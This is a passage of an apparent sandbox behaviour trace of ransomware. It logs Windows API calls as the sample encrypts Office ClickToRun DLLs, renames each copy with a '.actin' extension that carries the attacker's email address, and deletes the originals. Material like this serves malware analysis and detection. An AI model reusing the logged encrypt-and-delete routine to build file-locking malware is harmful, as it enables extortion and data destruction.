CryptDestroyKey (hKey=0xac33b0) returned 1 [0142.394] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x122, lpOverlapped=0x0) returned 1 [0142.394] CryptDestroyKey (hKey=0xac2d70) returned 1 [0142.394] CloseHandle (hObject=0x2d8) returned 1 [0142.394] CloseHandle (hObject=0x2fc) returned 1 [0142.395] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll")) returned 1 [0142.396] SetEvent (hEvent=0x288) returned 1 [0142.396] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0142.396] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0142.396] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=24768) returned 1 [0142.396] CloseHandle (hObject=0x2fc) returned 1 [0142.396] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll")) returned 0x20 [0142.397] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.397] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0142.397] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0142.397] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0142.397] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0142.397] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3070) returned 1 [0142.397] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0142.397] ReadFile (in: hFile=0x2fc, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x60c0, lpOverlapped=0x0) returned 1 [0142.642] CryptEncrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60d0, dwBufLen=0x60d0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60d0) returned 1 [0142.642] WriteFile (in: hFile=0x2d8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x60d0, lpOverlapped=0x0) returned 1 [0142.644] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2d70) returned 1 [0142.644] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0142.644] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60, dwBufLen=0x60 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60) returned 1 [0142.644] CryptDestroyKey (hKey=0xac2d70) returned 1 [0142.644] WriteFile (in: hFile=0x2d8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x112, lpOverlapped=0x0) returned 1 [0142.644] CryptDestroyKey (hKey=0xac3070) returned 1 [0142.644] CloseHandle (hObject=0x2fc) returned 1 [0142.644] CloseHandle (hObject=0x2d8) returned 1 [0142.645] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll")) returned 1 [0142.646] SetEvent (hEvent=0x288) returned 1 [0142.646] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0142.646] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0142.646] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=307416) returned 1 [0142.647] CloseHandle (hObject=0x2d8) returned 1 [0142.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll")) returned 0x20 [0142.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.647] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0142.647] SetEvent (hEvent=0x288) returned 1 [0142.647] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0142.647] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0142.647] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=2118360) returned 1 [0142.647] CloseHandle (hObject=0x2d8) returned 1 [0142.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll")) returned 0x20 [0142.648] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0142.648] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0142.648] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll")) returned 1 [0142.649] SetEvent (hEvent=0x288) returned 1 [0142.649] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0142.649] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0142.649] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=468696) returned 1 [0142.649] CloseHandle (hObject=0x2d8) returned 1 [0142.649] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll")) returned 0x20 [0142.649] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.649] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0142.650] SetEvent (hEvent=0x288) returned 1 [0142.650] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0142.650] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0142.650] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=396960) returned 1 [0142.650] CloseHandle (hObject=0x2d8) returned 1 [0142.650] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll")) returned 0x20 [0142.650] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.650] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0142.651] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0142.651] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0142.651] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0142.651] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2e70) returned 1 [0142.651] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0142.651] ReadFile (in: hFile=0x2d8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x60ea0, lpOverlapped=0x0) returned 1 [0142.659] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60eb0, dwBufLen=0x60eb0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60eb0) returned 1 [0142.660] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x60eb0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x60eb0, lpOverlapped=0x0) returned 1 [0142.667] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac30f0) returned 1 [0142.667] CryptSetKeyParam (hKey=0xac30f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0142.667] CryptEncrypt (in: hKey=0xac30f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0142.667] CryptDestroyKey (hKey=0xac30f0) returned 1 [0142.667] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0142.668] CryptDestroyKey (hKey=0xac2e70) returned 1 [0142.668] CloseHandle (hObject=0x2d8) returned 1 [0142.668] CloseHandle (hObject=0x2fc) returned 1 [0142.676] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll")) returned 1 [0142.679] SetEvent (hEvent=0x288) returned 1 [0142.680] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0142.680] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0142.680] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=473760) returned 1 [0142.680] CloseHandle (hObject=0x2fc) returned 1 [0142.680] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll")) returned 0x20 [0142.680] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.680] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0142.680] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0142.680] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0142.680] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0142.681] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac34b0) returned 1 [0142.681] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0142.681] ReadFile (in: hFile=0x2fc, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x73aa0, lpOverlapped=0x0) returned 1 [0142.972] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x73ab0, dwBufLen=0x73ab0 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x73ab0) returned 1 [0142.972] WriteFile (in: hFile=0x2d8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x73ab0, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x73ab0, lpOverlapped=0x0) returned 1 [0142.980] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3130) returned 1 [0142.980] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0142.980] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0142.980] CryptDestroyKey (hKey=0xac3130) returned 1 [0142.980] WriteFile (in: hFile=0x2d8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0142.981] CryptDestroyKey (hKey=0xac34b0) returned 1 [0142.981] CloseHandle (hObject=0x2fc) returned 1 [0142.981] CloseHandle (hObject=0x2d8) returned 1 [0142.990] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll")) returned 1 [0142.996] SetEvent (hEvent=0x288) returned 1 [0142.996] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0142.996] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0142.996] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=210648) returned 1 [0142.996] CloseHandle (hObject=0x2fc) returned 1 [0142.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll")) returned 0x20 [0142.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0142.997] SetEvent (hEvent=0x288) returned 1 [0142.997] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0142.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0142.997] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1402584) returned 1 [0142.997] CloseHandle (hObject=0x2fc) returned 1 [0142.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll")) returned 0x20 [0142.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.998] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0142.998] SetEvent (hEvent=0x288) returned 1 [0142.998] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0142.998] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0142.998] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1761448) returned 1 [0142.998] CloseHandle (hObject=0x2d8) returned 1 [0142.998] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll")) returned 0x20 [0142.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0142.999] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0142.999] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0142.999] SetFilePointerEx (in: 